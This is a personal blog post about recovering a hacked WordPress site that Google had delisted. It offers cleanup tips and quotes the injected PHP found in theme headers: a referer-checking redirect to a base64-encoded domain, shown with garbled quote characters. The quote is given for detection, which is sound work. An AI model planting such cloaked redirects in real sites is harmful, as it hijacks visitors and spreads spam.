After help from numerous resources online (scroll to the bottom of Busted by Google to see some of the sites that helped me track down my hacked files), and combing through jillions (it feels like) files, I find this morning that my google search engine results are restored to normal. That was REALLY fast.

Though I use Google’s Webmaster Tools regularly (which is where one finds messages from Google about misbehaving sites), I never did hear from Google in writing about the issue. I just noticed that I was gone from the SERPs, practically overnight, and traffic was way down, which are classic symptoms of this latest round of hacks.

Presume that Google is way overloaded dealing with these issues, and they conveyed their, uh, concern for my site by removing me from the SERPs in the first place

If you think you may have been hacked, or if you haven’t and want to make sure you aren’t, here are some things to look out for:

Has your blog vanished from the search engine listings and your traffic fallen off tremendously?
I had some medical issues which kept me occupied and away from my blog for awhile. I naively concluded I just need to write more to build them back up. Don’t make that assumption. Start looking at Google’s cached version of your site and you may be in for an unpleasant surprise.

Patting yourself on the back for running the latest version of WordPress?
Even though you may be running the latest version of WP, you may have been infected prior to upgrading and not know it. I upgraded on May 29 to WP 2.5.1; I think I was hacked on 4/25, and those nasty files clung to my site files during the upgrade. You have to remove them manually.

Losing Focus.
In the midst of searching for and carving out compromised files, I read some discussions on Google’s definition of duplicate content. Probably not a good idea to start tackling other issues in the midst the hack abatement, but not thinking clearly, I sped off in that direction.

I revamped the way WordPress displays my page content to make certain I wasn’t violating that guideline, quickly building a new freestanding index page from instructions I found in the WordPress codex and at dailyblogtips.com (thanks to a tip from a fellow IVAA member, Laura Nieberding. Thanks, Laura!).

Right after putting the finishing touches on that and patting myself for taking measures NOT to display duplicate page content, I returned hack abatement.

The next tip I read about concerned base64 code and cookies that might be installed in the head area of infected WordPress theme files. I had already checked for those and, at THAT point, wasn’t affected.)

But wait a minute…

To build my new archives page, I had just grabbed two files from one of the default theme folders on my Theme folder, to create my new archives page, since my own theme didn’t include those files.

Hideously, I opened those files up and, the base 64 and cookies redirection malicious code was embedded at the top of the header code. Here’s the code you are looking for (thanks to bloggerguide.net):
< ?php \
$seref=array(�google�,�msn�,�live�,�altavista�,
�ask�,�yahoo�,�aol�,�cnn�,�weather�,�alexa�);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=�1?; break; }
if($ser==�1? && sizeof($_COOKIE)==0){ header(�Location: http://�.base64_decode(�YW55cmVzdWx0cy5uZXQ=�).�/�); exit;
}?>

In ignorance, I presumed that these default themes were installed (or installed over the top of previous versions) when I upgraded to 2.5.1. So, sliced that out, and continued down the list.

Be sure to notify Google of your efforts to remove offending code.
I wrote three separate “Request for Reconsideration” notes to Google, as I discovered more and made more inroads in digging out the offending code. Maybe overkill but I wanted to let them know I was working as hard as I could at eradicating that crap.

Report hidden code spam.
Google has a form you can use to report spammers, and those who employ hidden code, hidden links, and redirects. If someone embedded these in your site, find the embedded links and send thoseis a form you can fill out listing any offending web site that may have embedded code in your site, via a redirection. I sliced out an example of the hidden links, showing where they were redirecting to, in case that helped Google amass info on how these hacks are being accomplished.

I am not skilled in php, and am an average or below user of CSS. I do not want to be expert in hack abatement. Also, because I am a Mac user, I am largely inexperienced in dealing with hacks and viruses, etc.

What should others like me do about running blogs in view of the risk management and damage control that blogging seems to require now days???